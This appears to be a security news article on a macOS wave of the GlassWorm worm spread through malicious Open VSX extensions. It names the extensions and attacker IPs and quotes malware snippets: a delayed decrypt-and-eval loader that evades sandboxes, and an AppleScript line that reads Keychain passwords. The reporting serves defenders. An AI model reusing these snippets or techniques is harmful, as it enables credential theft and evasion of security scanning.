“`html
A fresh onset of GlassWorm malware has surfaced, representing a notable change in targeting approach from Windows to macOS platforms. This self-replicating worm, disseminated via harmful VS Code extensions on the Open VSX marketplace, has already amassed more than 50,000 downloads.
The fourth wave brings numerous alarming alterations including encrypted payloads, capabilities to Trojanize hardware wallets, and advanced sandbox evasion techniques that enable it to elude conventional security scanning tools.
The threat actor behind GlassWorm has demonstrated considerable flexibility, adapting through four unique phases since October. Earlier campaigns utilized invisible Unicode characters and compiled Rust binaries to obfuscate malicious code.
The most recent version discards these tactics in favor of AES-256-CBC encrypted JavaScript payloads specifically crafted for macOS settings.
.webp)
Three questionable extensions were detected on the Open VSX marketplace: pro-svelte-extension, vsce-prettier-pro, and full-access-catppuccin-pro-extension, all linked through common infrastructure and encryption keys.
The malware utilizes a Solana-based command and control system that renders takedown attempts almost futile.
By posting transaction memos containing base64-encoded URLs to the blockchain, the attacker keeps decentralized control that cannot be disrupted through traditional domain blocking methods.
Investigators traced the infrastructure to IP address 45.32.151.157, previously utilized in the third wave, confirming the continuity of the threat actor.
Koi analysts uncovered the malware through behavioral analysis after their risk detection engine observed abnormal patterns in extension behavior and network activity.
Encrypted Payload and Sandbox Evasion Strategies
The fourth wave introduces an ingenious timing mechanism designed to elude automated security evaluations. Upon installation, the harmful extension waits precisely 15 minutes prior to executing its payload.
This delay is crucial as most sandbox environments timeout within 5 minutes, allowing the malware to appear entirely harmless during automated scans.
The code contains a hardcoded value of 9e5 milliseconds (900,000 milliseconds equates to 15 minutes), activating the decryption and execution of the AES-256-CBC encrypted payload.
setTimeout(() => {
const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
let payload = decrypted.update(encryptedData, 'base64', 'utf8');
payload += decrypted.final('utf8');
eval(payload);
}, 9e5);.webp)
The payload itself is integrated at line 64 of the main extension file, encrypted with a hardcoded key and initialization vector that remains uniform across all three harmful extensions.
This consolidated cryptographic framework confirms a single threat actor is accountable for the campaign.
Once the delay period concludes, the malware retrieves the current command-and-control endpoint from the Solana blockchain and carries out any instructions it acquires.
The macOS-specific payload incorporates AppleScript for stealthy execution, LaunchAgents for persistence instead of Windows Registry keys, and direct access to the macOS Keychain database to recover saved passwords and credentials.
set keychainPassword to do shell script "security find-generic-password -s 'password_service' -w"The malware also possesses the ability to replace hardware wallet applications with trojanized versions, specifically targeting both Ledger Live and Trezor Suite.
Although the wallet replacement feature was not fully operational during evaluations on December 29, 2025, the code infrastructure is complete and poised for payload uploads.
The malware verifies that downloaded files surpass 1000 bytes before installation, avoiding flawed installations that could alert victims.
All pilfered data is staged in the temporary directory /tmp/ijewf/, compressed, and dispatched to the exfiltration server at 45.32.150.251/p2p for attacker retrieval.
“`